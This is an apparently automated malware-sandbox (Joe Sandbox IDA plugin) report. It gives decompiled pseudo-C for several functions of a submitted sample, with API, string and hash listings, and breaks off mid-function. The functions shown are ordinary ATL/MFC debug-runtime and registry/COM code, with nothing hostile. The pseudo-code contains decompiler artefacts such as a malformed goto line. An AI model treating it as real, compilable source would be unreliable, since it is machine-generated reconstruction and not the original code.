                      • Instruction Fuzzy Hash: A2812CB4600204EFEB14CF18C985FE93766BB84359F558268F8495F392DB75EE86CB80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 80%
                      			E00956190(void* __edi, void* __esi, signed int* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				signed int* _v8;
                      				char _v48;
                      				signed int _v56;
                      				signed int _v64;
                      				signed int _v72;
                      				signed int _v76;
                      				void _v80;
                      				void* _t96;
                      				void* _t110;
                      				signed int* _t121;
                      				signed int _t132;
                      				signed int _t146;
                      				void* _t159;
                      				void* _t160;
                      				void* _t161;
                      
                      				memset( &_v80, 0xcccccccc, 0x13 << 2);
                      				_t161 = _t160 + 0xc;
                      				_v8 = _a4;
                      				E00954D70( &_v48, _v8[1], _a8, _a12, _a16, 1);
                      				_v56 = _v8[6];
                      				_v8[6] =  &_v48;
                      				_v64 = 0;
                      				_t157 = _t161;
                      				_v72 = E009D1520( *((intOrPtr*)( *( *_v8)))(_v8[1], _a8, _a12, _a16,  &_v64, 0), _t161 - _t161);
                      				_t121 = _v8;
                      				_t164 =  *((intOrPtr*)(_t121 + 0x18)) -  &_v48;
                      				if( *((intOrPtr*)(_t121 + 0x18)) !=  &_v48) {
                      					_t110 = L00994930(_t164, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xf55, 0, L"%ls", L"pThis->m_pCurrentMsg == &msg");
                      					_t161 = _t161 + 0x18;
                      					if(_t110 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				_t146 = _v56;
                      				_v8[6] = _t146;
                      				if(_v72 == 0) {
                      					__eflags = _a8 - 0x82;
                      					if(__eflags == 0) {
                      						_t132 = _v8[7] | 0x00000001;
                      						__eflags = _t132;
                      						_t146 = _v8;
                      						 *(_t146 + 0x1c) = _t132;
                      					}
                      					L16:
                      					if((_v8[7] & 0x00000001) != 0) {
                      						_t146 = _v8;
                      						if( *((intOrPtr*)(_t146 + 0x18)) == 0) {
                      							_v76 = _v8[1];
                      							_v8[1] = 0;
                      							_v8[7] = _v8[7] & 0xfffffffe;
                      							_t146 =  *_v8;
                      							E009D1520( *((intOrPtr*)( *((intOrPtr*)(_t146 + 0xc))))(_v76), _t161 - _t161);
                      						}
                      					}
                      					_push(_t146);
                      					_push(_v72);
                      					E009D14C0(_t159, 0x956368);
                      					_pop(_t96);
                      					return E009D1520(_t96, _t159 - _t161 + 0x4c);
                      				}
                      				_v80 = _a8;
                      				if(_v80 > 0x132) {
                      					_v80 = _v80 - 0x133;
                      					if(_v80 > 5) {
                      						L11:
                      						_t146 = _v8[7] & 0x00000001;
                      						__eflags = _t146;
                      						if(__eflags == 0) {
                      							_t146 =  *(_v8 + 4);
                      							E0094C3E0(_t157, _t146, 0, _v64);
                      							_t161 = _t161 + 0xc;
                      						}
                      						L13:
                      						goto L16;
                      					}
                      					_t146 = _v80;
                      					goto  *((intOrPtr*)(_t146 * 4 +  &M00956480))[L10]goto ( *((intOrPtr*)(_t146 * 4 +  &M00956480)));
                      					L10:
                      					_v72 = _v64;
                      					goto L13;
                      				}
                      				if(_v80 == 0x132) {
                      					goto L10;
                      				}
                      				_v80 = _v80 - 0x2e;
                      				if(_v80 > 0xe2) {
                      					goto L11;
                      				}
                      				_t42 = _v80 + 0x95639c; // 0x62af9000
                      				switch( *((intOrPtr*)(( *_t42 & 0x000000ff) * 4 +  &M00956394))) {
                      					case 0:
                      						goto L10;
                      					case 1:
                      						goto L11;
                      				}
                      			}

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 0095634E
                      Strings
                      • pThis->m_pCurrentMsg == &msg, xrefs: 0095621F
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00956230
                      • %ls, xrefs: 00956224
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$pThis->m_pCurrentMsg == &msg
                      • API String ID: 930174750-2182017553
                      • Opcode ID: 624bda0b31088cb79a0ab72d5a9ac0a006b26848f5a06a451cac67b3863fbe5d
                      • Instruction ID: c260a07f077a701b446a52089fccbad7a8a1997bad169290f5752502be5540b5
                      • Opcode Fuzzy Hash: 624bda0b31088cb79a0ab72d5a9ac0a006b26848f5a06a451cac67b3863fbe5d
                      • Instruction Fuzzy Hash: 88614675E00208EFCB18DF99D591AADB7B6FF88305F248159E915AB391C730AE46DF80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 76%
                      			E009470C0(void* __ecx, char* __edx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, intOrPtr _a12) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				char _v24;
                      				char _v36;
                      				char* _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				void _v56;
                      				intOrPtr _t48;
                      				intOrPtr _t53;
                      				intOrPtr _t54;
                      				void* _t56;
                      				intOrPtr _t58;
                      				void* _t62;
                      				void* _t64;
                      				void* _t65;
                      				void* _t66;
                      				intOrPtr _t70;
                      				intOrPtr _t81;
                      				char* _t82;
                      				void* _t91;
                      				void* _t92;
                      				void* _t93;
                      
                      				_t82 = __edx;
                      				_push(__ecx);
                      				memset( &_v56, 0xcccccccc, 0xd << 2);
                      				_t93 = _t92 + 0xc;
                      				_pop(_t70);
                      				_v8 = _t70;
                      				do {
                      					if(_a8 < 0) {
                      						_v52 = 0;
                      					} else {
                      						_v52 = 1;
                      					}
                      					_v12 = _v52;
                      					_t96 = _v12;
                      					if(_v12 == 0) {
                      						_t66 = L00994930(_t96, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlstr.h", 0x70, 0, "%ls", L"__atl_condVal");
                      						_t93 = _t93 + 0x18;
                      						if(_t66 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					if(_v12 != 0) {
                      						goto L9;
                      					}
                      					_t54 = 0;
                      					L31:
                      					_push(_t82);
                      					E009D14C0(_t91, 0x947274);
                      					_t56 = _t54;
                      					return E009D1520(_t56, _t91 - _t93 + 0x34);
                      					L9:
                      					_t82 = 0;
                      					__eflags = 0;
                      				} while (0 != 0);
                      				__eflags =  *_a4 - _v8;
                      				if(__eflags != 0) {
                      					_t65 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlstr.h", 0x71, 0, "%ls", L"pData->pStringMgr == this");
                      					_t93 = _t93 + 0x18;
                      					__eflags = _t65 - 1;
                      					if(_t65 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				_t48 = E00951ED0( &_a8,  &_a8, _a8, 1);
                      				_t93 = _t93 + 0xc;
                      				__eflags = _t48;
                      				if(_t48 >= 0) {
                      					_t82 = _a8;
                      					_v44 = L00951F10(_t82, 8);
                      					while(1) {
                      						__eflags = _a8 - _v44;
                      						if(_a8 > _v44) {
                      							_v56 = 0;
                      						} else {
                      							_v56 = 1;
                      						}
                      						_v48 = _v56;
                      						__eflags = _v48;
                      						if(__eflags == 0) {
                      							_t64 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlstr.h", 0x7d, 0, "%ls", L"__atl_condVal");
                      							_t93 = _t93 + 0x18;
                      							__eflags = _t64 - 1;
                      							if(_t64 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v48;
                      						if(_v48 == 0) {
                      							break;
                      						}
                      						__eflags = 0;
                      						if(0 != 0) {
                      							continue;
                      						}
                      						_t82 = _v44;
                      						_t53 = E00941860(_a12,  &_v36, _t82, _a12);
                      						_t93 = _t93 + 0xc;
                      						__eflags = _t53;
                      						if(_t53 < 0) {
                      							L27:
                      							_t54 = 0;
                      							goto L31;
                      						}
                      						_t82 =  &_v24;
                      						_t58 = E009516D0(_t53, _v36, _t82, 0x10, _v36);
                      						_t93 = _t93 + 0xc;
                      						__eflags = _t58;
                      						if(_t58 >= 0) {
                      							_t82 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 4))));
                      							_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t82 + 8))))(_a4, _v24);
                      							__eflags = _t93 - _t93;
                      							_v16 = E009D1520(_t62, _t93 - _t93);
                      							__eflags = _v16;
                      							if(_v16 != 0) {
                      								_t81 = _v44 - 1;
                      								__eflags = _t81;
                      								_t82 = _v16;
                      								 *((intOrPtr*)(_t82 + 8)) = _t81;
                      								_t54 = _v16;
                      							} else {
                      								_t54 = 0;
                      							}
                      							goto L31;
                      						}
                      						goto L27;
                      					}
                      					_t54 = 0;
                      				} else {
                      					_t54 = 0;
                      				}
                      			}




























                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 0094725B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlstr.h$__atl_condVal$pData->pStringMgr == this
                      • API String ID: 930174750-2123114947
                      • Opcode ID: 7ab23848f071b19b1d8406b4d44a37a868719dbe2fceafc4b2ec7bf8e1129293
                      • Instruction ID: 6890ac51b81d9acc2c44c83afba3fab9a8e015d3dbea4a93ef0e4c30f24d4f5e
                      • Opcode Fuzzy Hash: 7ab23848f071b19b1d8406b4d44a37a868719dbe2fceafc4b2ec7bf8e1129293
                      • Instruction Fuzzy Hash: 0F518175E5820CABDB14DBE4DC86FEEF3B8AB88708F108519F915B7281D7B4E9448B50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 62%
                      			E00952DE0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				void* _t51;
                      				void* _t54;
                      				void* _t55;
                      				intOrPtr _t62;
                      				void* _t67;
                      				void* _t86;
                      				void* _t87;
                      				void* _t88;
                      				void* _t89;
                      
                      				_t87 = __esi;
                      				_t86 = __edi;
                      				_t67 = __ebx;
                      				_v32 = 0xcccccccc;
                      				_v28 = 0xcccccccc;
                      				_v24 = 0xcccccccc;
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				do {
                      					if(_a4 == 0) {
                      						_v24 = 0;
                      					} else {
                      						_v24 = 1;
                      					}
                      					_v8 = _v24;
                      					do {
                      						_t92 = _v8;
                      						if(_v8 == 0) {
                      							_t51 = L00994930(_t92, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x71, 0, "%ls", L"__atl_condVal");
                      							_t89 = _t89 + 0x18;
                      							if(_t51 == 1) {
                      								asm("int3");
                      							}
                      						}
                      					} while (0 != 0);
                      					_t95 = _v8;
                      					if(_v8 == 0) {
                      						E00942500(_t67, _t86, _t87, _t95, 0x80070057);
                      					}
                      				} while (0 != 0);
                      				do {
                      					if(_a8 < 0) {
                      						_v28 = 0;
                      					} else {
                      						_v28 = 1;
                      					}
                      					_v12 = _v28;
                      					do {
                      						_t98 = _v12;
                      						if(_v12 == 0) {
                      							_t54 = L00994930(_t98, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x72, 0, "%ls", L"__atl_condVal");
                      							_t89 = _t89 + 0x18;
                      							if(_t54 == 1) {
                      								asm("int3");
                      							}
                      						}
                      					} while (0 != 0);
                      					_t101 = _v12;
                      					if(_v12 == 0) {
                      						E00942500(_t67, _t86, _t87, _t101, 0x80070057);
                      					}
                      				} while (0 != 0);
                      				do {
                      					if(_a12 == 0) {
                      						_v32 = 0;
                      					} else {
                      						_v32 = 1;
                      					}
                      					_v16 = _v32;
                      					do {
                      						_t104 = _v16;
                      						if(_v16 == 0) {
                      							_t55 = L00994930(_t104, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x73, 0, "%ls", L"__atl_condVal");
                      							_t89 = _t89 + 0x18;
                      							if(_t55 == 1) {
                      								asm("int3");
                      							}
                      						}
                      					} while (0 != 0);
                      					_t107 = _v16;
                      					if(_v16 == 0) {
                      						E00942500(_t67, _t86, _t87, _t107, 0x80070057);
                      					}
                      				} while (0 != 0);
                      				if( *_a4 == _a12) {
                      					__eflags = _a8 - _a16;
                      					if(__eflags <= 0) {
                      						_t58 = _a4;
                      						 *_a4 = _a12;
                      					} else {
                      						_t58 = E0096B960(_a8, 1);
                      						_t89 = _t89 + 8;
                      						 *_a4 = _t58;
                      					}
                      				} else {
                      					if(_a8 <= _a16) {
                      						_t58 = E00994B40( *_a4);
                      						_t89 = _t89 + 4;
                      						 *_a4 = _a12;
                      					} else {
                      						_t62 = E00992210( *_a4, _a8, 1);
                      						_t89 = _t89 + 0xc;
                      						_v20 = _t62;
                      						_t111 = _v20;
                      						if(_v20 == 0) {
                      							E00942500(_t67, _t86, _t87, _t111, 0x8007000e);
                      						}
                      						_t58 = _a4;
                      						 *_a4 = _v20;
                      					}
                      				}
                      				_t112 =  *_a4;
                      				if( *_a4 == 0) {
                      					_t58 = E00942500(_t67, _t86, _t87, _t112, 0x8007000e);
                      				}
                      				return E009D1520(_t58, _t88 - _t89 + 0x1c);
                      			}




















                      APIs
                      • __wdupenv_s.LIBCMTD ref: 00952F35
                        • Part of subcall function 00942500: _Smanip.LIBCPMTD ref: 0094253B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Smanip__wdupenv_s
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlconv.h$__atl_condVal
                      • API String ID: 167151435-2826139414
                      • Opcode ID: cefd4a2cecdb199b248a9c862750260edbe6171c2b30e47f57313e3d7af73592
                      • Instruction ID: 0aa5bdbb69df8b755400ebf89f8a9495833c8d16a418833e4e4ff92a7bceda93
                      • Opcode Fuzzy Hash: cefd4a2cecdb199b248a9c862750260edbe6171c2b30e47f57313e3d7af73592
                      • Instruction Fuzzy Hash: F2516C70E00209EFDF10DF65D847BAE7774AB5671AF208519FD04AB281E3B49A98CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 87%
                      			E00944490(char** __ecx, void* __esi, void* _a4, char* _a8, char* _a12, int _a16, int _a20, struct _SECURITY_ATTRIBUTES* _a24, intOrPtr* _a28) {
                      				char** _v8;
                      				char** _v12;
                      				int _v16;
                      				char** _v20;
                      				char** _v24;
                      				void* _v28;
                      				char** _v32;
                      				char** _v36;
                      				char** _v40;
                      				long _t53;
                      				void* _t57;
                      				void* _t67;
                      				char* _t83;
                      				void* _t90;
                      				void* _t91;
                      
                      				_t89 = __esi;
                      				_v40 = 0xcccccccc;
                      				_v36 = 0xcccccccc;
                      				_v32 = 0xcccccccc;
                      				_v28 = 0xcccccccc;
                      				_v24 = 0xcccccccc;
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				_t93 = _a4;
                      				if(_a4 == 0) {
                      					_t67 = L00994930(_t93, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x16e2, 0, "%ls", L"hKeyParent != 0");
                      					_t91 = _t91 + 0x18;
                      					if(_t67 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				_v28 = 0;
                      				if(_v8[2] == 0) {
                      					_t89 = _t91;
                      					_t83 = _a8;
                      					_t53 = RegCreateKeyExA(_a4, _t83, 0, _a12, _a16, _a20, _a24,  &_v28,  &_v16);
                      					__eflags = _t91 - _t91;
                      					_v40 = E009D1520(_t53, _t91 - _t91);
                      				} else {
                      					_t83 = _a8;
                      					_v40 = E00943200(_v8[2], _t89, _a4, _t83, 0, _a12, _a16, _a20, _a24,  &_v28,  &_v16);
                      				}
                      				_v36 = _v40;
                      				if(_v36 == 0) {
                      					if(_a28 != 0) {
                      						 *_a28 = _v16;
                      					}
                      					_v36 = E00944420(_v8, _t89);
                      					_t83 = _v28;
                      					 *_v8 = _t83;
                      					_v8[1] = _a20 & 0x00000300;
                      				}
                      				_push(_t83);
                      				_push(_v36);
                      				E009D14C0(_t90, 0x9445bc);
                      				_pop(_t57);
                      				return E009D1520(_t57, _t90 - _t91 + 0x24);
                      			}



















                      APIs
                      • RegCreateKeyExA.ADVAPI32(00000000,?,00000000,?,?,00000000,?,00000000,?), ref: 0094454C
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 009445A4
                      Strings
                      • %ls, xrefs: 009444C5
                      • hKeyParent != 0, xrefs: 009444C0
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 009444D1
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckCreateStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$hKeyParent != 0
                      • API String ID: 2215485779-2309544881
                      • Opcode ID: ffed914080337fb1cd0f5e12557b64b4d812964713e57f6ffbd7a6c92d751b81
                      • Instruction ID: 214e76f6051577fcd801e509337664ad350d8ce92832349bd25e7d0475f74fd5
                      • Opcode Fuzzy Hash: ffed914080337fb1cd0f5e12557b64b4d812964713e57f6ffbd7a6c92d751b81
                      • Instruction Fuzzy Hash: 3041D7B5E00209AFCB44DF98D891FEEB7F9AB88304F208159F509A7250E7759A41CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 94%
                      			E009D1C50(void* __ebx, void* __edx, void* __edi, void* __esi) {
                      				signed int _v8;
                      				char _v528;
                      				char _v1048;
                      				signed int _t13;
                      				void* _t17;
                      				void* _t27;
                      				void* _t30;
                      				void* _t42;
                      				signed int _t43;
                      				void* _t44;
                      				void* _t45;
                      
                      				_t42 = __esi;
                      				_t41 = __edi;
                      				_t40 = __edx;
                      				_t34 = __ebx;
                      				_t13 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t13 ^ _t43;
                      				if( *0xb337c8 != 0) {
                      					L13:
                      					_t15 = 0;
                      					goto L14;
                      				} else {
                      					 *0xb337c8 = 1;
                      					if(E009D1DA0(__edx) != 0) {
                      						L14:
                      						return E00957280(_t15, _t34, _v8 ^ _t43, _t40, _t41, _t42);
                      					} else {
                      						_t17 = E009D24D0(L"VCRUNTIME140D.dll");
                      						_t45 = _t44 + 4;
                      						if(_t17 == 0) {
                      							L8:
                      							if(E009D24E0(L"MSPDB140", 0, 0xa00) != 0) {
                      								goto L14;
                      							} else {
                      								if(GetLastError() != 0x57 || E009D24B0(0,  &_v1048, 0x104) == 0 || E009D2000(_t34, _t41,  &_v1048,  &_v528, 0x104) == 0) {
                      									goto L13;
                      								} else {
                      									return E00957280(E009D24E0( &_v528, 0, 8), _t34, _v8 ^ _t43, _t40, _t41, _t42);
                      								}
                      							}
                      						} else {
                      							_t27 = E009D24B0(_t17,  &_v1048, 0x104);
                      							_t45 = _t45 + 0xc;
                      							if(_t27 == 0) {
                      								goto L8;
                      							} else {
                      								_t30 = E009D2000(__ebx, __edi,  &_v1048,  &_v528, 0x104);
                      								_t45 = _t45 + 0xc;
                      								if(_t30 == 0) {
                      									goto L8;
                      								} else {
                      									_t15 = E009D24E0( &_v528, 0, 0x900);
                      									_t45 = _t45 + 0xc;
                      									if(_t15 != 0) {
                      										goto L14;
                      									} else {
                      										if(GetLastError() != 0x57) {
                      											goto L8;
                      										} else {
                      											_t15 = E009D24E0( &_v528, 0, 8);
                      											_t45 = _t45 + 0xc;
                      											if(_t15 != 0) {
                      												goto L14;
                      											} else {
                      												goto L8;
                      											}
                      										}
                      									}
                      								}
                      							}
                      						}
                      					}
                      				}
                      			}















                      APIs
                      • GetPdbDllFromInstallPath.LIBCMTD ref: 009D1C77
                        • Part of subcall function 009D1DA0: GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 009D1DE9
                        • Part of subcall function 009D1DA0: GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 009D1E0F
                        • Part of subcall function 009D1DA0: GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 009D1E21
                        • Part of subcall function 009D1DA0: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 009D1E33
                        • Part of subcall function 009D1DA0: FreeLibrary.KERNEL32(00000000), ref: 009D1E67
                        • Part of subcall function 009D24D0: GetModuleHandleW.KERNEL32(009D1C8E,?,009D1C8E,VCRUNTIME140D.dll), ref: 009D24D7
                      • GetLastError.KERNEL32 ref: 009D1CEB
                      • GetLastError.KERNEL32 ref: 009D1D25
                        • Part of subcall function 009D24B0: GetModuleFileNameW.KERNEL32(?,?,009D2111,?,009D2111,?,?,009D1975), ref: 009D24BF
                        • Part of subcall function 009D2000: __aligned_msize.LIBCMTD ref: 009D205F
                        • Part of subcall function 009D2000: __aligned_msize.LIBCMTD ref: 009D2079
                        • Part of subcall function 009D2000: __CrtDbgReportWV.LIBCMTD ref: 009D20A2
                        • Part of subcall function 009D24E0: LoadLibraryExW.KERNEL32(?,?,00000800,?,009D1DC7,api-ms-win-core-registry-l1-1-0.dll,00000000,00000800,?,?,00000000), ref: 009D24EF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AddressErrorLastProc$LibraryModule__aligned_msize$FileFreeFromHandleInstallLoadNamePathReport
                      • String ID: MSPDB140$VCRUNTIME140D.dll
                      • API String ID: 1159430209-1916464790
                      • Opcode ID: 198fac516ef287f2b6e3137c8c36172f24614147e6e0757dbdb641aeaa01dd70
                      • Instruction ID: 915ac5f2e248265752d6623bd66518697576e44f6e455690408a094ea688aa15
                      • Opcode Fuzzy Hash: 198fac516ef287f2b6e3137c8c36172f24614147e6e0757dbdb641aeaa01dd70
                      • Instruction Fuzzy Hash: DF3189B6EC020876EB20E7A0AD46F9973AD5B50705F148163FD05E62D3FB71DA44C6A1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 44%
                      			E009434A0(void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                      				char _v8;
                      				void* _v12;
                      				char _v16;
                      				char _v20;
                      				intOrPtr* _t30;
                      				void* _t33;
                      				intOrPtr _t35;
                      				void* _t37;
                      				void* _t40;
                      				void* _t46;
                      				intOrPtr* _t55;
                      				void* _t64;
                      				void* _t65;
                      
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				do {
                      					_t30 = _a4;
                      					_t67 =  *((intOrPtr*)(_t30 + 0x10));
                      					if( *((intOrPtr*)(_t30 + 0x10)) == 0) {
                      						_t46 = L00994930(_t67, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xfa, 0, "%ls", L"pCache != 0");
                      						_t65 = _t65 + 0x18;
                      						if(_t46 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					_t55 = 0;
                      				} while (0 != 0);
                      				_v12 = 0;
                      				if( *((intOrPtr*)(_a4 + 8)) != 0) {
                      					_t55 =  *((intOrPtr*)(_a4 + 8));
                      					_t33 =  *_t55( *((intOrPtr*)(_a4 + 0xc)), 0xa002d4,  &_v12);
                      					__eflags = _t65 - _t65;
                      					_v20 = E009D1520(_t33, _t65 - _t65);
                      					__eflags = _v20;
                      					if(_v20 >= 0) {
                      						_t55 = _a4;
                      						__imp__CoRegisterClassObject( *_t55, _v12, _a8, _a12,  *((intOrPtr*)(_a4 + 0x10)) + 4);
                      						__eflags = _t65 - _t65;
                      						_v20 = E009D1520( *_t55, _t65 - _t65);
                      					}
                      					__eflags = _v12;
